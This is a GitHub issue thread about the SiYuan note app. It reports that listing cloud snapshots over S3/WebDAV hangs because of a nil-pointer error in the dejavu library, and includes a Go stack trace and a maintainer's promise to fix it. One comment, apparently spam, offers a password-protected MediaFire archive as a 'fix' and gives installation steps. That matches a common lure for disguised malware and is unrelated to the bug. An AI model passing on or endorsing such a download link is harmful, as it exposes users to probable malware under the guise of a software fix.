### ISSUE TITLE
S3/WebDAV cannot get the list of cloud snapshots

### ISSUE THREAD

**Issue by fangguangyang** [siyuan-note/siyuan#12350]
获取云端快照一直处于转圈状态

### Is there an existing issue for this?

- [X] I have searched the existing issues

### Can the issue be reproduced with the default theme (daylight/midnight)?

- [X] I was able to reproduce the issue with the default theme

### Could the issue be due to extensions?

- [X] I've ruled out the possibility that the extension is causing the problem.

### Describe the problem

获取云端快照一直处于转圈状态，看日志存在空指针引用，对应位置的代码的话，err变量判断有问题，没有提前报错返回，导致报空指针引用
![image](https://github.com/user-attachments/assets/9fbc16e9-e46f-4111-b503-199cf6be98e0)

### Expected result

打印出报错日志

### Screenshot or screen recording presentation

![image](https://github.com/user-attachments/assets/2ff685e2-99fd-4845-ae0a-3aef29052de3)

### Version environment

```markdown
- Version: 3.1.4
- Operating System: 
- Browser (if used):
```

### Log file

/usr/local/go/src/runtime/signal_unix.go:900 (0x479f68)
/go/pkg/mod/github.com/siyuan-note/dejavu@v0.0.0-20240809144146-f563b9b073de/cloud/s3.go:192 (0x1b142aa)
/go/pkg/mod/github.com/siyuan-note/dejavu@v0.0.0-20240809144146-f563b9b073de/log.go:57 (0x1b25018)
/go/src/github.com/siyuan-note/siyuan/kernel/model/repository.go:854 (0x1c3b48b)
/go/src/github.com/siyuan-note/siyuan/kernel/api/repo.go:224 (0x1cebd89)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1c59199)
/go/src/github.com/siyuan-note/siyuan/kernel/model/session.go:328 (0x1c59172)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1c58d2f)
/go/src/github.com/siyuan-note/siyuan/kernel/model/session.go:249 (0x1c58d1d)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x115112a)
/go/pkg/mod/github.com/gin-contrib/sessions@v1.0.1/sessions.go:54 (0x1d176a4)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1c9f3a8)
/go/pkg/mod/github.com/gin-contrib/gzip@v1.0.1/handler.go:60 (0x1c9f390)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1d1abda)
/go/src/github.com/siyuan-note/siyuan/kernel/server/serve.go:640 (0x1d1abc8)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x115112a)
/go/src/github.com/siyuan-note/siyuan/kernel/server/serve.go:622 (0x1d1ce7e)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1c5952e)
/go/src/github.com/siyuan-note/siyuan/kernel/model/session.go:388 (0x1c5951a)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1c5947c)
/go/src/github.com/siyuan-note/siyuan/kernel/model/session.go:365 (0x1c5924f)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x1c59a29)
/go/src/github.com/siyuan-note/siyuan/kernel/model/session.go:414 (0x1c597e7)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/context.go:185 (0x115d1b1)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/gin.go:633 (0x115cc20)
/go/pkg/mod/github.com/gin-gonic/gin@v1.10.0/gin.go:589 (0x115c751)
/go/pkg/mod/golang.org/x/net@v0.28.0/http2/h2c/h2c.go:125 (0x114b2d2)
/usr/local/go/src/net/http/server.go:3210 (0x78b14d)
/usr/local/go/src/net/http/server.go:2092 (0x76a66f)
/usr/local/go/src/runtime/asm_amd64.s:1700 (0x4804a0)

**Comment by Evul88** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by 88250** [comment]
感谢反馈，稍后修复。
